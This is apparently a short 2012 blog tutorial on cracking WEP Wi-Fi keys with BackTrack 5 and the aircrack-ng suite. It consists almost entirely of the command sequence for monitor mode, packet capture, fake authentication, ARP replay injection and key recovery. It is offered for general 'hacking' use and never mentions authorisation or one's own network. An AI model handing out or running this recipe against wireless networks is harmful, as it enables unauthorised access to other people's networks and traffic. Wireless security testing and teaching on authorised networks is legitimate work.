Wednesday, February 15, 2012

[TUT] BackTrack 5 - Cracking WEP




If you aren't very familiar with BackTrack, watch the video, if you are just follow these steps.

Open a new terminal where it says too!

- Open Terminal
airmon-ng
airmon-ng start wlan0
airodump-ng mon0
CTRL+C to stop Scanning
airodump-ng -c (channel) -w (savingfile) --bssid (bssid) mon0

- Open New Terminal
aireplay-ng -1 0 -a (bssid) mon0
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b (bssid) mon0
Press Y when you get the prompt.

- Open New Terminal (25k Data)
aircrack-ng -n 64 -b (bssid) (savingfile)-01.cap

Thanks for Reading! Goodluck Hacking WEPs!